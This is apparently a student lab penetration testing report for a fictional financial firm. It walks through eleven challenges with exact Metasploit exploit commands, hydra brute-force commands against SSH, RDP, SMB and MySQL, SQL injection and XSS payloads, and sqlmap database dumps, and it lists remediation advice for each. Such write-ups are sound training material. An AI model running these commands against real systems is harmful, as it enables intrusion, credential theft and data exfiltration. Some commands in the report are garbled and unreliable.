Penetration Testing Report

Contents
Document Details ............................................................................................................. 1
Version History Information ............................................................................................ 1
I. Executive Summary .................................................................................................... 2
1.1 Project Scope .............................................................................................................. 2
1.2 Project Objectives ....................................................................................................... 2
1.3 Testing Methodology.................................................................................................. 2
1.3.1 Planning ............................................................................................................... 2
1.3.2 Exploitation ......................................................................................................... 3
1.3.3 Reporting ............................................................................................................. 3
II. Comprehensive Technical Report .......................................................................... 4
[Challenge 1:] Network Scanning and Service Enumeration ........................................... 4
[Challenge 2:] Penetration Testing Windows - Vulnerability in Server service .............. 8
[Challenge 3:] Penetration Testing Ubuntu - Bash Bug vulnerability ........................... 12
[Challenge 4:] Penetration Testing Centos – Brute-force SSH Authentication ............. 16
[Challenge 5:] Applications Penetration Testing – Vulnerable Application. ................. 18
[Challenge 6:] Web Application Penetration Testing – www.fnb.com ......................... 23
[Challenge 7:] Penetration Testing WordPress Site for Plugin Vulnerabilities ............. 28
[Challenge 8:] Active Directory Penetration Testing – Brute-Force RDP authentication
............................................................................................................................. ........... 31
[Challenge 9:] Web Application Penetration Testing – ENTERTAINMENT ............... 36
[Challenge 10:] Database Penetration Testing – Brute-Force MySQL authentication .. 43
[Challenge 11:] Penetration Testing Joomla Site for component Vulnerabilities .......... 45
Document Details

Document Title Penetration Testing Report

Company
Recipient FNB Financial Services
Date
Classification Confidential

Document Type Report

Version 1.0

Author

Pen Testers CEHer/Him

Reviewed By

Approved By
Version History Information

Date Version Author Comments

August 16, 2019 v1.0 ECSA Final Draft

1
 I. Executive Summary
1.1 Project Scope
The assessment performed was focused on FNB Financial Services’ internal network and
its related application infrastructure. This result is intended to be an overall assessment of
FNB Financial Services network, and those systems and subnets that fall within the scope
of this project.
Furthermore, the findings in this report reflect the conditions found during the testing,
and do not necessarily reflect current conditions.
1.2 Project Objectives
Score of vulnerabilities as following in table below

Intruders can easily gain control of hosts and network.

Critical
This needs immediate attention.
Intruders can possibly gain control of the host, or there
may be potential leakage of highly sensitive
High
information. This should be addressed as soon as
possible.
This could result in potential misuse of the host by
Elevated intruders. Address this at your convenience but do as
soon as possible.
Intruders may be able to collect sensitive information
from the host, such as the precise version of software
installed. With this information, intruders can easily
Moderate
exploit known vulnerabilities specific to software
versions. Address this the next time you perform a
minor reconfiguration of the host.
Intruders can collect information about the host (open
ports, services, etc.) and may be able to use this
Low information to find other vulnerabilities. Address this
the next time you perform a major reconfiguration of
the host.
1.3 Testing Methodology
1.3.1 Planning
During the planning, we gather information from the server in which the web
application is installed. Then, we detect the path information and identifiable software
and determined the running their versions.

2
1.3.2 Exploitation
Utilizing the information gathered during the planning, we start to find the vulnerability
for each piece of software and service that we discovered after that trying to exploit it.
1.3.3 Reporting
Based on the results from the first two steps, we start analyzing the results. Our risk
rating is based on this calculation:
Risk = Threat * Vulnerability * Impact
After calculating the risk rating, we start writing the report on each risk and how to
mitigate it.

3
 II. Comprehensive Technical Report
[Challenge 1:] Network Scanning and Service Enumeration
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
Once we identified the target system and completed the initial reconnaissance, as discussed
in the above step, we started looking for a mode of entry into the target system. We
conducted network scanning on IP addresses [ ] authorized for scanning by the organization
on/from Apr 16-Apr 20, 2018. The purpose of scanning is to discover exploitable
communication channels, probe as many listeners as possible, and keep track of the ones
that are responsive or useful to an attacker’s particular needs. In the scanning phase of an
attack, the attacker tries to find various ways to intrude into a target system. The attacker
also tries to discover more about the target system by finding out what operating system is
used, what services are running, and whether or not there are any configuration lapses in
the target system then the attacker tries to form an attack strategy based on facts learned
during the scan.
Methodology: Our tests were configured not to cause an intentional Denial of Service
condition in a well maintained network. Most of the scanned IP addresses did not respond
to our scans. This is normal when the IP address is not in use, the host assigned to the IP
address is turned off, or a network protection device such as a firewall prevents scanning
the host.

4
5
Network Hosts After repeated scanning, primarily with Nmap, and using wildcards (*) for
the subnet and host parts of the IP addresses, we discovered following live hosts in the
target network.
# IP Address Operating System
1. 172.19.19.2 Windows 7 Utimate 7601 SP1

2. 172.19.19.3 Windows Server 2008 Standard 6001 SP1

3. 172.19.19.4 Windows Server 2008 Standard 6001 SP1

4. 172.19.19.5 Linux Ubuntu

5. 172.19.19.6 Windows Server 2012

6. 172.19.19.7 Windows Server 2008 Standard 6001 SP1

7. 172.19.19.8 Windows XP SP3

8. 172.19.19.9 Windows 8
9. 172.19.19.10 Windows 7 Utimate 7601 SP1
6
 Windows Server 2008 7601 R2 Enterprise
10. 10.10.0.2
Service Pack 1
Windows Server 2008 7601 R2 Enterprise
11. 10.10.0.3
Service Pack 1
172.17.0.2 Windows Server 2008 7601 R2 Enterprise
12.
Service Pack 1
13. 172.17.0.3 Centos 6.4 Final
Table 2.1.1 Live Systems in the Network
After discovering live systems, we started port scanning for find open port and identify the
services running on these hosts. Port scanning is the process of checking the services
running on the target computer by sending a sequence of messages in an attempt to break
in. In this case, we use nmap in KaliLinux machine with command nmap –A <ip> with
each host in Table 1. Result is following Table 2

# IP Address Ports Open Services running Machine name

21, 45, 80, 135, ftp, msrpc, netbios- ACCOUNT
1. 172.19.19.2 139, 445, 3389, ssn, microsoft-ds,
49152-49157 rdp, http, ssh
53, 80, 88, 135, ftp, msrpc, netbios- WINULY858KHQIP
139,161, 389, 445, ssn, microsoft-ds,
464, 593, 636, rdp, http, kerberos-
2. 172.19.19.3 3268, 3269, 3389, sec, ldap,
5357, 5722, 49152- ncacn_http,
49158, 49161, kpasswd5
49165, 49167
21, 80, 135, 139, ftp, msrpc, netbios- ADVERTISEMENT
3. 172.19.19.4 445, 5357, 49152- ssn, microsoft-ds,
49157 http
172.19.19.5 80, 5353 http, mdns Ubuntu
4.
80, 135, 139, 445, msrpc, netbios-ssn, HRDEPT
5. 172.19.19.6 3306, 5985, 47001, microsoft-ds, http,
49152- 49157 mysql
21, 80, 135, 139, ftp, msrpc, netbios- MARKETING
6. 172.19.19.7 445, 5357, 49152- ssn, microsoft-ds,
49157 http
21, 135 , 139, 445, ftp, msrpc, netbios- OPERATIONS
7. 172.19.19.8
3389 ssn, rdp

7
 21, 80, 135, 139, ftp, msrpc, netbios- RDDEPT
8. 172.19.19.9 445, 3306, 3389, ssn, rdp, mysql,
49152-49158 http

8
 21, 80, 135, 139, ftp, msrpc, netbios- SALES
9. 172.19.19.10 445, 3389, 49152- ssn, rdp, http
49157
21, 80, 135, 139, ftp, msrpc, netbios- ENTERTAINMENT
10. 10.10.0.2 445, 3389, 47001, ssn, microsoft-ds,
49152- 49157 rdp, http
21, 80, 135, 139, ftp, msrpc, netbios- ECOMM
445, 3389, 3306, ssn, microsoft-ds,
11. 10.10.0.3
47001, 49152- rdp, http, mysq
49157
21, 80, 135, 139, ftp, msrpc, netbios- WIN-AG46I02
12. 172.17.0.2 445, 3389, 47001, ssn, microsoft-ds,
49152- 49157 rdp, http
13. 172.17.0.3 21, 22, 23 ftp, ssh, telnet Centos
Table 2.1.2 Ports open and Services
Recommendations: We recommend following ways to avoid malicious network scanning
and enumeration:
 Filter inbound ICMP message types at the perimeter
 Filter all outbound ICMP type 3 “unreachable” messages at the edge routers and
firewalls to prevent UDP port scanning and firewalking from being effective.
 Consider configuring Internet firewalls so they can identify ports scans and throttle
the connections accordingly.
 Ensure that your routing and filtering appliances (both routers and firewalls) can’t
be bypassed using specific source ports or source routing techniques.
 If you run FTP services ensure that your firewalls aren’t vulnerable to state
circumvention attacks relating to malformed PORT and PASV commands
Exploitability: There is no exploitability information for this vulnerability.
[Challenge 2:] Penetration Testing Windows - Vulnerability in Server service
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
The vulnerability could allow remote code execution if an affected system received a
specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows
Server 2003 systems, an attacker could exploit this vulnerability without authentication to
run arbitrary code. It is possible that this vulnerability could be used in the crafting of a
wormable exploit
9
Exploitation
1. Scanning the Network
Base on result of Challenge 1, we founded a machine name “OPERATION” with IP
address: 172.19.19.8. This machine is running Windows XP Service Pack 3 operation
system. This version of OS has ended of life, ended of support and has a lot of
vulnerabilities.
2. Scanning for VA
We use Nessus to scan for VA with “OPERATION” machine and observed that Nessus
has detected the machine to be vulnerable to MS08-067. The result infers that the version
of SMB used in the machine is vulnerable, which means we can perform penetration testing
on this vulnerability, can allow us to run malicious code without authentication.

3. Exploiting MS-08-067 Vulnerability

We use Metaexploit Framwork in KaliLinux machine to try to exploit this vulnerability.
First, we lauched a new command line terminal, typed msfconsole and pressed Enter. This
lauches msfconsole

1
0
Next, we type use exploit/windows/smb/ms08_067_netapi. This launched the ms-08-067
exploit module.

We need to input some information to use this module, such as Target IP and Payload to
be used.
 set RHOSTS 172.19.19.8
 set PAYLOAD windows/meterpreter/bind_tcp

As we hit run command it started exploiting the vulnerable services in “OPERATION”

machine and run arbitrary code execution is performed. After a wait of 2-3 minutes, a
meterpreter session appeared indicating successful code execution as shown in the
screenshot.

10
a, After the exploit we take Hash value of the file “Employee Insurance Details.xlsx”
follow challenge request:
First, we search file named “Employee Insurance*”

Next, we download this file to KaliLinux machine and use md5sum or sha1sum command
to calculator hash value

b, After investigate we found a hidden message in bullfight-1934.jpg

11
Impact: An attacker could exploit this vulnerability without authentication to run
malicious code.
Result Analysis: The above exploit shows that a vulnerable service can allow an attacker
to pawn the complete hosting machine.
Recommendations:
 Update patch immediately
 Block port 445 in Windows Firewall if not use
[Challenge 3:] Penetration Testing Ubuntu - Bash Bug vulnerability
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description: The vulnerability affects Bash, a common component known as a
shell that appears in many versions of Linux and Unix. Bash acts as a command language
interpreter. In other words, it allows the user to type commands into a simple text-based
window, which the operating system will then run. Bash can also be used to run commands
passed to it by applications and it is this feature that the vulnerability affects. A one type
of command that can be sent to Bash allows environment variables to be set. Environment
variables are dynamic, named values that affect the way processes are run on a computer.
The vulnerability lies in the fact that an attacker can tack-on malicious code to the
environment variable, which will run once the variable is received.
Exploitation: The most likely route of attack is through Web servers utilizing CGI
(Common Gateway Interface), the widely-used system for generating dynamic Web
content. An attacker can potentially use CGI to send a malformed environment variable to

12
a vulnerable Web server. Because the server uses Bash to interpret the variable, it will also
run any malicious command tacked-on to it.
Base on Challenge 1, we found only 1 machine running Ubuntu Operation System with IP
addess 172.19.19.5 and open two ports:
 80/tcp/http
 5353/udp/mdn
In KaliLinux machine, we use OWAPSP DirBuster to find for hiden link in this site and
we found this link /cgi-bin/cinema.

13
Try to open this link in Web Browser:

We launched a new command line terminal, typed msfconsole and pressed Enter to
launches msfconsole.

14
In command line terminal, typed exploit/multi/http/apache_mod_cgi_bash_env_exec to
use the ShellShock exploit module

We need to input some information to use this module, such as Target IP, Target URI and
Payload to be used by typing following commands:
 set RHOSTS 172.19.19.5
 set TARGETURI /cgi-bin/cinema
After all done, we hit run command it started exploiting the vulnerable services. After a
wait of 2-3 minutes, a meterpreter session appeared indicating successful code execution
as shown in the screenshot.

15
After exploit, we take Hash value of the file “Customer Data.xlsx” follow challenge
request:

Impact: The vulnerability lies in the fact that an attacker can tack-on malicious code to the
environment variable, which will run once the variable is received
Result Analysis: The above exploit shows that a vulnerable service can allow an attacker
to pawn the complete hosting machine.
Recommendations: Update to the latest version of Bash.
[Challenge 4:] Penetration Testing Centos – Brute-force SSH Authentication
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description: Brute force attacks on the Secure Shell (SSH) service have been used
to compromise accounts and passwords. With this approach, an automated program often
tests combinations, one at a time, of possible usernames and passphrases.
Exploitation:

16
Base on Challenge 1, we found a machine running Centos Operation System with IP addess
172.17.0.3 and open port 22 for SSH and port 23 for telnet.
We use hydra to brute force SSH password in this challenge. First, we lauched a new
command line terminal, typed hydra –l root –P
/usr/share/wordlists/metaexploit/unix_password.list ssh://172.17.0.3 –t 4 and pressed
Enter. This command mean we use hydra to brute force root account with unix weak
password list.
We found user name and password as screenshot above.

17
We login to the server and take hash value follow challenge request:

Impact: Take control server privilege

Result Analysis: The exploit shows how to brute-force weak password policy. System is
using weak password and allow root account remote login.
Recommendations
 Setting stronger password policy.
- Requiring users to create complex passwords
- Limiting the number of times a user can unsuccessfully attempt to log in
- Temporarily locking out users who exceed the specified maximum number of
failed login attempts
 Not permit Root account remote login to system.
[Challenge 5:] Applications Penetration Testing – Vulnerable Application.
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description: An application vulnerability is a system flaw or weakness in an
application that could be exploited to compromise the security of the application. Once an
18
attacker has found a flaw, or application vulnerability, and determined how to access it, the
attacker has the potential to exploit the application vulnerability to facilitate a cybercrime.
These crimes target the confidentiality, integrity, or availability (known as the “CIA triad”)
of resources possessed by an application, its creators, and its users. Attackers typically rely
on specific tools or methods to perform application vulnerability discovery and
compromise.
Exploitation:
a, We use nmap to discover more about this machine with command nmap –A 172.19.19.2
–p 1-65000 and found ssh banner “WeOnlyDo sshd 2.1.3”

We observed this ssh service is vulnerable. It allows attackers can exploit this issue to
bypass the authentication mechanism and gain unauthorized access. We launched a new
command line terminal, typed msfconsole and pressed Enter. This launches msfconsole.

19
Next, we use freesshd_authbypass exploit module by type
“exploit/windows/ssh/freesshd_authbypass” in msfconsole command line

20
Next, we have issued the following commands:
 set RHOST 172.19.19.2
 set RPORT 45
 set PAYLOAD windows/meterpreter/bind_tcp

After run the exploit, we have meterpreter session to control Accounts machine

21
Next, we take Hash value of the file “FNB_Trading_Summary” follow challenge request:

b, Base on result of Challenge 1, we know a machine named “Accounts” has open Remote
Desktop Service. We will use hydra to brute force with username Arnold with password in
file unix_password.txt at /usr/share/worlists/metaexploit/unix_password.txt with
command “hydra –l Arnold –P /usr/share/worlists/metaexploit/unix_password.txt
rdp://172.19.19.2 –t 4”.

After attack, we know the password of username Arnold is “orange”

Impact: Remote attackers can exploit this issue to bypass the authentication mechanism
and gain unauthorized access
Result Analysis: The above exploit shows that a vulnerable service can allow an attacker
to pawn the complete hosting machine.
22
Recommendations
 Remove or Upgrade application to new version. It requires FreeSSHd > 1.2.6
 Setting stronger password policy.
- Requiring users to create complex passwords
- Limiting the number of times a user can unsuccessfully attempt to log in
- Temporarily locking out users who exceed the specified maximum number of
failed login attempts
[Challenge 6:] Web Application Penetration Testing – www.fnb.com
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description: Database Vulnerability Assessments are essential in a methodical and
proactive way to deal with database security and diminish the danger connected with both
web and database particular assaults and bolster agreeability with significant norms, laws
& regulations. SQL injection is a type of web application vulnerability where an attacker
can manipulate and submit a SQL command to retrieve the database information. This type
of attack mostly occurs when a web application executes by using the user-provided data
without validating or encoding it. It can give access to sensitive information such as social
security numbers, credit card numbers, or other financial data to the attacker and allows an
attacker to create, read, update, alter, or delete data stored in the backend database. It is a
flaw in web applications and not a database or web server issue. Most programmers are
still unaware of this threat. Cross-Site Scripting (XSS) attacks are a type of injection, in
which malicious scripts are injected into otherwise benign and trusted web sites. XSS
attacks occur when an attacker uses a web application to send malicious code, generally in
the form of a browser side script, to a different end user. Flaws that allow these attacks to
succeed are quite widespread and occur anywhere a web application uses input from a user
within the output it generates without validating or encoding it.

23
Exploitation:
We use OWASP to discover vulnerability in Website www.fnb.com. First step, we
launched a new command line terminal, typed owasp-zap to start OWASP ZAP

Next, type www.fnb.com into “URL to attack” text box and pressed Attack button. After a
wait of 2-3 minutes, we know this website have XSS vulnerability and Blind SQL Injection
vulnerability at Login.aspx with two parameters: txtusername and txtpwd

24
 a) Performed Blind SQL Injection Attack
Open Website in Web Browser and login with username and password is 1’ or 1=1 –

25
 b) Performed XSS Attack
Open Website in Web Browser and comment in a blog with contain string
“<script>alert(“XSS”)</script>”

26
Impact: If this vulnerability is successfully exploited, SQL injection can be used to
perform the following types of attacks:
Authentication bypass: Here the attacker could enter into the network without providing
any authentic user name or password and could gain the access over the network. He or
she gets the highest privilege in the network.
Information disclosure: After unauthorized entry into the network, the attacker gets access
to the sensitive data stored in the database.
Compromised data integrity: The attacker changes the main content of the website and also
enters malicious content into it.
Compromised availability of data: The attacker uses this type of attack to delete the data
related to audit information or any other crucial database information.
Remote code execution: An attacker could modify, delete, or create data or even can create
new accounts with full user rights on the servers that share files and folders. It allows an
attacker to compromise the host operating system
Result Analysis: The most common operation in SQL is the query, and it is performed
with the declarative SELECT statement. This SELECT command retrieves the data from
one or more tables. SQL queries allows a user to describe or assign the desired data, and
leave the DBMS (Data Base Management System) as responsible for optimizing, planning,
and performing the physical operations. A SQL query includes a list of columns to be
included in the final result of the SELECT keyword. If the information submitted by a
browser to a web application is inserted into a database query without being properly
checked, then there may be a chance of occurrence of SQL injection. HTML form that
receives and passes the information posted by the user to the Active Server Pages (ASP)
script running on IIS web server is the best example of SQL injection. The information
passed is the user name and password. By querying a SQL server database these two data
items are checked.
Username: 1' or 1=1 -- Password: TESTER
The query executed is: SELECT Count(*) FROM Users WHERE UserName='1' or 1=1 --
' AND Password=' TESTER'; However, the ASP script builds the query from user data
using the following line: Blah query = "SELECT * FROM users WHERE username = '" +
1' or 1=1 -- +"' AND password = '" + TESTER + "'"; If the user name is a single-quote
character (') the effective query becomes: SELECT * FROM users WHERE username = '''
AND password = '[TESTER]'; This is invalid SQL syntax and produces a SQL server error
message in the user's browser: Microsoft OLE DB Provider for ODBC Drivers error
'80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark
before the character string '' and password=''. /login.asp, line 16 The quotation mark
provided by the user has closed the first one, and the second generates an error, because it
is unclosed. At this instance, to customize the behavior of a query, an attacker can begin
injecting strings into it. The content proceeding the double hyphes (--) signify a Transact-
SQL comment.

27
Recommendations
Make no assumptions about the size, type, or content of the data that is received by your
application.
 Test the size and data type of input and enforce appropriate limits to prevent buffer
overruns.
 Test the content of string variables and accept only expected values.
 Reject entries that contain binary data, escape from sequences, and comment
characters.
 Never build Transact-SQL statements directly from user input and use stored
procedures to validate user input.
 Implement multiple layers of validation and never concatenate user input that is not
validated.
[Challenge 7:] Penetration Testing WordPress Site for Plugin Vulnerabilities
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description: If your WordPress website uses a vulnerable plugin, you’re at risk.
Successful exploitation of these bug could lead to Blind SQL Injection attacks, which
means an attacker could grab sensitive information from your database, including
username (hashed) passwords and, in certain configurations, WordPress Secret Keys
(which could result in a total site takeover). Auditing the security of the WordPress and
plugins will be an important task during your security assessment and pen testing
assignment if your organization uses a WordPress installation.
Enumeration: Base on Challenge 1, we know port 80 opened in the machine named
“HRDEPT”, access to this machine by Web Browser and we found a website running
Wamp Server and WordPress at address http://172.19.19.6/ECSA.
To attack to this machine, we will attack to this WordPress site. Use WPSCAN to detect
vulnerability with command “wpscan -u http://172.19.19.6/ECSA –enumerate vt” and
found this website are using “inboudio marketing 2.0.3” that have vulnerability.

28
Exploitation:
In scan result, we found this site are using a plugin named “inboudio marketing 2.0.3” that
have vulnerability allows for arbitrary file upload and remote code execution. For proof of
concept, we use Metasploit with wp_inboundio_marketing_file_upload module.
Open the terminal on KaliLinux machine, load metasploit framework and execute
following command:
 use exploit/windows/ wp_inboundio_marketing_file_upload
 set LHOST 172.19.19.6
 set TARGETURI /ECSA
 run
After sometimes, we have a meterpreter session to control this machine:

29
After the exploit, we found the file “Employee Details.xlsx” in
“C:\Users\Administrator\Documents” and take Hash value of the file

30
Impact: The vulnerability allows for arbitrary file upload and remote code execution
Result Analysis: The above exploit shows that a vulnerable plugin can allow an attacker
to pawn the complete hosting machine.
Recommendations: Update or remove this plugin from your WordPress installation.
[Challenge 8:] Active Directory Penetration Testing – Brute-Force RDP
authentication
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description: A brute force attack is a trial-and-error method used to obtain
information such as a user password or personal identification number (PIN). In a brute
force attack, automated software is used to generate a large number of consecutive guesses
as to the value of the desired data SNMP enumeration is the process of using SNMP to
enumerate user accounts on a target system. SNMP employs two major types of software
components for communication: the SNMP agent, which is located on the networking
device, and the SNMP management station, which communicates with the agent.
Enumeration: In Challenge 1, we know Active Directory machine because it running
some service like kerberos-sec and ldap. It is machine with named WINULY858KHQIP
and IP address is 172.19.19.3

31
Exploitation: Base on Challenge 1, Active Directory machine opened port udp_161, this
port is use for snmp service. We use snmpcheck command with default SNMP community
is “public” in KaliLinux machine to find out information from AD machine.

We have some information in this machine such as running services, network

configuration, opened ports, a list of users and a share folder name “Public”

32
Based on obtaining information, we observed SMB service can be brute-forced. In
KaliLinux machine, we use hydra tool with unix_password.txt word list to brute-forced
this service. To do this, use command “hydra -l administrator -P
/usr/share/wordlists/rockyou.taz.gz smb://172.19.19.3 –t 5 -V”

After sometimes,we founded password of administrator account.

33
Next, we open Remote Desktop and connect into AD server with Administrators account.

34
35
And we can extract employee data from the Active Directory:
 Anderson M
 Jack M
 Jason A
 John B
 Rebeca D
 Sam C
 Sharon E
Impact: Take control active directory privileged.
Result Analysis: The exploit shows how to obtain information and brute-force weak
password policy
Recommendations:
 Setting stronger password policy.
- Requiring users to create complex passwords
- Limiting the number of times a user can unsuccessfully attempt to log in
- Temporarily locking out users who exceed the specified maximum number of
failed login attempts
 Hardening server/services following best practice.
 With SNMP services: Disabling the SNMP service or simply removing the SNMP
agent, if disabling SNMP is not possible, changing the default PUBLIC community name
to something else
[Challenge 9:] Web Application Penetration Testing – ENTERTAINMENT
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description: An application vulnerability is a system flaw or weakness in an
application that could be exploited to compromise the security of the application. Once an
attacker has found a flaw, or application vulnerability, and determined how to access it, the
attacker has the potential to exploit the application vulnerability to facilitate a cybercrime.
These crimes target the confidentiality, integrity, or availability (known as the “CIA triad”)
of resources possessed by an application, its creators, and its users. Attackers typically rely
on specific tools or methods to perform application vulnerability discovery and
compromise.
Exploitation:
We used OWASP ZAP in KaliLinux machine for scanning http://10.10.0.2/moviescope
with options like below and select attack:

36
After OWASP ZAP completed the scan, we found Blind SQL Injection at Login.aspx with
two parameters: txtusername and txtpwd.

We opened url http://10.10.0.2/moviescope/login.aspx and try to login with username is

admin and password is “1’ or 1=1--”

37
 After login successful, we found viewprofiles.aspx is “insecure object reference”. We can
change whatever ID.

a,With id=4. We found Steve’s information

38
b, Because moviescope and xsecurity running on the same machine. We continue to attack
Blind SQL Injection for enumeration database by using SQL Map in KaliLinux machine:

And we found 9 databases in this host

39
In this result, we focus into database named “Xsecurity”

We found three tables and continues enumeration columns from Users tables.

40
In this challenge, we dump data of users from Users tables and have result as below

41
c, SQL Server version

Impact:
If this vulnerability is successfully exploited, SQL injection can be used to perform the
following types of attacks:
 Authentication bypass: Here the attacker could enter into the network without
providing any authentic user name or password and could gain the access over the
network. He or she gets the highest privilege in the network.
 Information disclosure: After unauthorized entry into the network, the attacker gets
access to the sensitive data stored in the database.
 Compromised data integrity: The attacker changes the main content of the website
and also enters malicious content into it.
 Compromised availability of data: The attacker uses this type of attack to delete the
data related to audit information or any other crucial database information.
 Remote code execution: An attacker could modify, delete, or create data or even can
create new accounts with full user rights on the servers that share files and folders.
It allows an attacker to compromise the host operating system.
Result Analysis:
The most common operation in SQL is the query, and it is performed with the declarative
SELECT statement. This SELECT command retrieves the data from one or more tables.
SQL queries allows a user to describe or assign the desired data, and leave the DBMS (Data
Base Management System) as responsible for optimizing, planning, and performing the
physical operations. A SQL query includes a list of columns to be included in the final
result of the SELECT keyword.
Recommendations
 Make no assumptions about the size, type, or content of the data that is received by
your application.
42
 Test the size and data type of input and enforce appropriate limits to prevent buffer
overruns.
 Test the content of string variables and accept only expected values.
 Reject entries that contain binary data, escape sequences, and comment characters.
 Never build Transact-SQL statements directly from user input and use stored
procedures to validate user input.
 Implement multiple layers of validation and never concatenate user input that is not
validated.
[Challenge 10:] Database Penetration Testing – Brute-Force MySQL authentication
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
Enumeration: A brute force attack is a trial-and-error method used to obtain information
such as a user password or personal identification number (PIN). In a brute force attack,
automated software is used to generate a large number of consecutive guesses as to the
value of the desired data
Exploitation:
Based on result of Challenge 01. We have a machine name "ECOMM" with IP Address:
10.10.0.3. This machine open port 3306 for MySQL service. We tried to Brute-Force that
services with hydra

43
We found username: root, password: test. We dump all database in local and using notepad
to view data.

Try to view the dump file:

Impact: Take control MySQL privilege. Show sensitive information.

Result Analysis: The exploit shows how to brute-force weak password policy.
Recommendations
 Setting stronger password policy.
- Requiring users to create complex passwords

44
 - Limiting the number of times a user can unsuccessfully attempt to log in
- Temporarily locking out users who exceed the specified maximum number of failed
login attempts
 Hardening server/services following best practice.
 Configure the firewall to limit IP address connect to port 3306
[Challenge 11:] Penetration Testing Joomla Site for component Vulnerabilities
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
If your Joomla website uses a vulnerable component, you’re at risk. Successful exploitation
of these bug could lead to Blind SQL Injection attacks, which means an attacker could grab
sensitive information from your database, including username, (hashed) passwords and, in
certain configurations, Joomla Secret Keys (which could result in a total site takeover).
Auditing the security of the Joomla and component will be an important task during your
security assessment and pen testing assignment if your organization uses a Joomla
installation.
Enumeration:
First, we fond that website are running joomla by view page source

We started with enumerating the Joomla version. We can find out version when we browser
that XML files as below

45
When know the machine named as “RDDept” have a website running Joomla vesion 3.1.4
that have many vulnerability. We us It was observed that a CVE name CVE-2013-5576
has been identified. After a quick research, we identified that this CVE related component
is vulnerable to arbitrary file upload. For proof of concept, we started with performing pen
testing on the website by uploading an arbitrary PHP code in the website via the Joomla
Media Manager Files Upload component in order to attain remote access to the target
server. We launched msfconsole and used the joomla_media_upload_exec exploit in the
msf console with flowing commands
 use exploit/unix/webapp/ joomla_media_upload_exec
 set RHOST 172.19.19.9
 set TARGETURI ECSA/
 run

Exploitation:
As we hit run command it started exploitating the vulnerable component in joomla i.e.,
arbitrary file upload and remote code execution is performed. After a wait of 2-3 minutes,

46
a meterpreter session appeared indicating successful code execution as shown in the
screenshot

47
After exploit we take Hash value of the file “RnD NDA.pdf” follow challenge request:

Impact:
The vulnerability allows for arbitrary file upload and remote code execution.
Result Analysis:
The above exploit shows that a vulnerable component can allow an attacker to pawn the
complete hosting machine.
Recommendations:
Upgrade to Joomla 3.15 or newer

48